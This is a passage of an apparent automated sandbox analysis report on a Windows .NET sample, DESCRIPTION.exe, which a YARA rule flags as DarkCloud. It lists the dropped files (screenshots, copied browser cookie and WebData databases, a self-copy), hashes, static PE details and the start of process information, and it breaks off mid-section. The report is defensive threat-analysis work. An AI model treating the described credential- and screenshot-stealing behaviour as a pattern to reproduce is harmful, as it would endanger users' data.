                                                              Preview:BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotNtbZgDXe.BMP

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                              Category:dropped
                                                              Size (bytes):3932214
                                                              Entropy (8bit):6.777656715384363
                                                              Encrypted:false
                                                              SSDEEP:12288:UXMTDU5vwyzMikDNOpP+kgp26NPwAg9sLOzuSIQpPkSW/5GLqpPp2bE92PJkVbJk:1Tevz4i97IQps+xQADJ7W/X7A
                                                              MD5:3738DD8ACD28DE5AD779CB8BABD894A3
                                                              SHA1:2D10A4132468DBD6B0A70FE543C6B4CCF6B78202
                                                              SHA-256:8D85EFF7230766C245535AB28E1566CE84DF4539D90A90867D66791B494568EC
                                                              SHA-512:C9256BAB9A9377915F7DB804EE02605198BB6BE317040CA8AC41069C1E975B36019FBC20354F58CCEB0C67B082EF467D0FA920399E321D3559FC9B877B272F0C
                                                              Malicious:false
                                                              Preview:BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotQzNDdPcz.BMP

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                              Category:dropped
                                                              Size (bytes):3932214
                                                              Entropy (8bit):6.777706239417477
                                                              Encrypted:false
                                                              SSDEEP:12288:UEaTDU5vwyzMikDNOpP+kgp26NPwAg9sLOzuSIQpPkSW/5GLqpPp2bE92PJkVbJk:UTevz4i97IQps+xQADJ7W/X7A
                                                              MD5:9285D832A66E4CBF8F05D886D72CD57D
                                                              SHA1:96582EFD39E7E4737BF8740F12B2155084943080
                                                              SHA-256:9A460B950A0146992A158E3C04BB23153F7ADC1E08EB4BD71D46D0E772E8BF3D
                                                              SHA-512:830BA72D278A36FFBD12A21F68DC7B881DF0733366450AE18AB3F480314C45E943A15370FF59A089D2A12B00FF5E8D3AEA0CA9BD228C2FF85D77E92D6F46E4F6
                                                              Malicious:false
                                                              Preview:BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotSKnNsmFg.BMP

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                              Category:dropped
                                                              Size (bytes):3932214
                                                              Entropy (8bit):6.783472093823591
                                                              Encrypted:false
                                                              SSDEEP:12288:+hQwyzMikDNOpP+kgp26NPwAg9sLOzuSIQpPkSW/5GLqpPp2bE92PJkVbJy+Od1D:9z4i97IQps+xQADJ7W/X7A
                                                              MD5:1DB3356666C4CA311AF24565B6539127
                                                              SHA1:C41E86B3E6247918F85C53A0D9916A924BC85A76
                                                              SHA-256:550BA69A146291CDB584E8EDBE5B10F8FB50DBED7425446DA429BFEA68F5FDAF
                                                              SHA-512:5267ED50027E2423846FC9FFBB06E554750C3BC4A110479C386BE0811F5FB6CB3FA9B3040FAD131CD1E00AB96434ED26121CDD988CE04276051F69A40FD79DA9
                                                              Malicious:false
                                                              Preview:BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotVhWFmqqc.BMP

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                              Category:dropped
                                                              Size (bytes):3932214
                                                              Entropy (8bit):6.769179733961269
                                                              Encrypted:false
                                                              SSDEEP:12288:JDkTDU5vwyzMikDNOpP+kgp26NPwAg9sLOzuSIQpPkSW/5GLqpPp2bE92PJkVbJk:+Tevz4i97IQps+xQADJ7W/X7A
                                                              MD5:299A6BCB7C6CC1BB6344854FCF37B36E
                                                              SHA1:CCC31E9D488825BD0E8E09693A612584E07F823A
                                                              SHA-256:E5CC1854FD51FCF3342CF5BE33D9973F8B586335ED29CD06B2E11149230D382D
                                                              SHA-512:8980C47CA539BB5BB69A4DE7C6437EF8CEC638A3B634C5B19B51C4FE89800C6331D6F5567A84B1822F0B5D9F9BB27C82241B28C579857C4C03C6C204D46AC9E6
                                                              Malicious:false
                                                              Preview:BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotZoBUmOFl.BMP

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                              Category:dropped
                                                              Size (bytes):3932214
                                                              Entropy (8bit):6.7838655498663885
                                                              Encrypted:false
                                                              SSDEEP:12288:UXMTDU5RNpU781SNOpP+kgp26NPwAg9sLOzuSIQpPkSW/5GLqpPp2bE92PJkVbJk:1TeRrK837IQps+xQADJ7W/X7A
                                                              MD5:0F8EFE91BC3DD7210551221554721073
                                                              SHA1:D46FDFAAA73037412F6A31AB8D869D0A13E5906E
                                                              SHA-256:48F185A6A0146B0774B04D106AFEAE1B88F993D460A125E7693ABA4464C35857
                                                              SHA-512:29A068AFE6F3DF749E0549F2D63A2748399801C65E1D051820C4C91F345C4A368E01901869ADF9E50FDDFF156B62FF6F852FD4CC8C69DECAE575E67B2F60555F
                                                              Malicious:false
                                                              Preview:BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotcErqgxyS.BMP

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                              Category:dropped
                                                              Size (bytes):3932214
                                                              Entropy (8bit):6.777656715384363
                                                              Encrypted:false
                                                              SSDEEP:12288:UXMTDU5vwyzMikDNOpP+kgp26NPwAg9sLOzuSIQpPkSW/5GLqpPp2bE92PJkVbJk:1Tevz4i97IQps+xQADJ7W/X7A
                                                              MD5:3738DD8ACD28DE5AD779CB8BABD894A3
                                                              SHA1:2D10A4132468DBD6B0A70FE543C6B4CCF6B78202
                                                              SHA-256:8D85EFF7230766C245535AB28E1566CE84DF4539D90A90867D66791B494568EC
                                                              SHA-512:C9256BAB9A9377915F7DB804EE02605198BB6BE317040CA8AC41069C1E975B36019FBC20354F58CCEB0C67B082EF467D0FA920399E321D3559FC9B877B272F0C
                                                              Malicious:false
                                                              Preview:BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshothITslGLa.BMP

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                              Category:dropped
                                                              Size (bytes):3932214
                                                              Entropy (8bit):6.793819757485885
                                                              Encrypted:false
                                                              SSDEEP:12288:Uu3TDU5vwyzMikDNOpP+kgp26NPwAg9sLOzuSIQpPkSW/5GLqpPp2bE92PJkVbJc:nTevz4i97IQps+xQAcCQHlFIXV
                                                              MD5:510C61E5C7D2A8F14A8FE3C720756265
                                                              SHA1:EBE5FF3A6B3A51D5A22D8D863BE1E20022629007
                                                              SHA-256:D142B0D2008BA7BB393D240C8EFF712BFA1E73F20F240A2FD4741CD1A334A3B1
                                                              SHA-512:9A3283162F1EB34896AD39AC8987B171AA620DBA6B8D719009823696A048DF0C7ECDEF039A04E9098E63CA9771928E2F7EA34EE9CAC8861785EBFBD4DCAF2B91
                                                              Malicious:false
                                                              Preview:BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotlKYCoDvm.BMP

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                              Category:dropped
                                                              Size (bytes):3932214
                                                              Entropy (8bit):6.79668450348965
                                                              Encrypted:false
                                                              SSDEEP:12288:UXMTDU5vwyzMikDNOpP+kgp26NPwAg9sLOzuSIQpPkSW/5GLqpPp2bE92PJkVbJt:1Tevz4i97IQps+xQAEvkleEdfY
                                                              MD5:223EAA96A51E4F95D12749659BDAA3DF
                                                              SHA1:B552543BDE379210C5E7213BC776A6193C11E156
                                                              SHA-256:3F9AC06A0067F9071D6D1716DD2EC86194E8EEF68139F658530C95295E547CE7
                                                              SHA-512:747F15751801DA090F103D2826780232750A26CA8E3DE39577C30BF30B910F05692588077C6FBAAFDBDBA4EC13AB5C42DC8C84B906DD08C3B43405F94B79DDDC
                                                              Malicious:false
                                                              Preview:BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotoUpRFhhH.BMP

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                              Category:dropped
                                                              Size (bytes):3932214
                                                              Entropy (8bit):6.777656715384363
                                                              Encrypted:false
                                                              SSDEEP:12288:UXMTDU5vwyzMikDNOpP+kgp26NPwAg9sLOzuSIQpPkSW/5GLqpPp2bE92PJkVbJk:1Tevz4i97IQps+xQADJ7W/X7A
                                                              MD5:3738DD8ACD28DE5AD779CB8BABD894A3
                                                              SHA1:2D10A4132468DBD6B0A70FE543C6B4CCF6B78202
                                                              SHA-256:8D85EFF7230766C245535AB28E1566CE84DF4539D90A90867D66791B494568EC
                                                              SHA-512:C9256BAB9A9377915F7DB804EE02605198BB6BE317040CA8AC41069C1E975B36019FBC20354F58CCEB0C67B082EF467D0FA920399E321D3559FC9B877B272F0C
                                                              Malicious:false
                                                              Preview:BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\ScreenshotphwBeaGd.BMP

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24, image size 3932160, cbSize 3932214, bits offset 54
                                                              Category:dropped
                                                              Size (bytes):3932214
                                                              Entropy (8bit):6.777656715384363
                                                              Encrypted:false
                                                              SSDEEP:12288:UXMTDU5vwyzMikDNOpP+kgp26NPwAg9sLOzuSIQpPkSW/5GLqpPp2bE92PJkVbJk:1Tevz4i97IQps+xQADJ7W/X7A
                                                              MD5:3738DD8ACD28DE5AD779CB8BABD894A3
                                                              SHA1:2D10A4132468DBD6B0A70FE543C6B4CCF6B78202
                                                              SHA-256:8D85EFF7230766C245535AB28E1566CE84DF4539D90A90867D66791B494568EC
                                                              SHA-512:C9256BAB9A9377915F7DB804EE02605198BB6BE317040CA8AC41069C1E975B36019FBC20354F58CCEB0C67B082EF467D0FA920399E321D3559FC9B877B272F0C
                                                              Malicious:false
                                                              Preview:BM6.<.....6...(.....................<.................$..$..#..#..#..#..#..#..$..$..$..$..$..$..$..$..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\WebData

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.1209886597424439
                                                              Encrypted:false
                                                              SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                              MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                              SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                              SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                              SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\cookies.db

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):98304
                                                              Entropy (8bit):0.08235737944063153
                                                              Encrypted:false
                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\cookies.db-shm

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):0.017262956703125623
                                                              Encrypted:false
                                                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                              Malicious:false
                                                              Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1030144
                                                              Entropy (8bit):7.7456028105140735
                                                              Encrypted:false
                                                              SSDEEP:24576:xiJN+UVsZLOSoQbnYPk0IJ+Gjn5MvtxUZUr9Al39yXK9kx8:c3+UwLBo9PTOxjnCrUW9qMXK1
                                                              MD5:93671481EC5215BB84AFDE48AD2280F1
                                                              SHA1:1A4F8481CADA880A1122D83707B3F9EA819F1139
                                                              SHA-256:00580380C811027C799634812E6F785DF11F2F2EB3FA1718AC8C4FF47FD6EF2D
                                                              SHA-512:544622FFF0B79BADC850EADCCBCBC58005F552813C4AB10859F1819CBE63127435D5C62AFC53037A1B2434D7EE14E21D1D4025561E039883036AF51A33BFC2EA
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 34%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!...............0.................. ........@.. ....................... ............@.................................V...O.......................................p............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........{..8i......x...T...@.............................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*....0..z........ ....}.......}......}......}.....s....}.....s....}.....(........+*..{.... ....o .....{......o!...o".......X...........-.*...0............{.....+..*.0...........r...p..r...p..r-..p..r?..p..rO..p..r_..p............s....}....~....(#.......9.....~....s$.........8`.......X.............YE........1...`...........

                                                              C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe:Zone.Identifier

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:true
                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):7.7456028105140735
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              • DOS Executable Generic (2002/1) 0.01%
                                                              File name:DESCRIPTION.exe
                                                              File size:1'030'144 bytes
                                                              MD5:93671481ec5215bb84afde48ad2280f1
                                                              SHA1:1a4f8481cada880a1122d83707b3f9ea819f1139
                                                              SHA256:00580380c811027c799634812e6f785df11f2f2eb3fa1718ac8c4ff47fd6ef2d
                                                              SHA512:544622fff0b79badc850eadccbcbc58005f552813c4ab10859f1819cbe63127435d5c62afc53037a1b2434d7ee14e21d1d4025561e039883036af51a33bfc2ea
                                                              SSDEEP:24576:xiJN+UVsZLOSoQbnYPk0IJ+Gjn5MvtxUZUr9Al39yXK9kx8:c3+UwLBo9PTOxjnCrUW9qMXK1
                                                              TLSH:2C25D0C03B257701DE6CB674853AEDB9A3642E74B000F5E26EDD2B8776DA203991CF46
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....!...............0.................. ........@.. ....................... ............@................................

                                                              File Icon

                                                              Icon Hash:00928e8e8686b000

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x4fcdaa
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0xE2218AEF [Wed Mar 22 06:57:51 2090 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                              Entrypoint Preview

                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              lodsd
                                                              fiadd word ptr [eax]
                                                              add bh, ch
                                                              mov esi, CAFE0000h
                                                              add byte ptr [eax], al
                                                              mov esi, 000000BAh
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xfcd560x4f.text
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xfe0000x5ac.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1000000xc.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xfa9940x70.text
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x20000xfadc00xfae008c3a2c7bbde338b1cdf86a00e97ef935False0.8916691968734429data7.749837441589309IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rsrc0xfe0000x5ac0x600e98ad758d06196946def365d4fa7d5b8False0.4212239583333333data4.087673485267169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0x1000000xc0x200a5844f4af1df6d3a69c42f46d67fbc4bFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_VERSION0xfe0900x31cdata0.4321608040201005
                                                              RT_MANIFEST0xfe3bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                              Imports

                                                              DLLImport
                                                              mscoree.dll_CorExeMain

                                                              Network Behavior

                                                              Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:1
                                                              Start time:07:21:16
                                                              Start date:15/01/2025
                                                              Path:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\DESCRIPTION.exe"
                                                              Imagebase:0xd0000
                                                              File size:1'030'144 bytes
                                                              MD5 hash:93671481EC5215BB84AFDE48AD2280F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000001.00000002.1501721613.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:3
                                                              Start time:07:21:18
                                                              Start date:15/01/2025
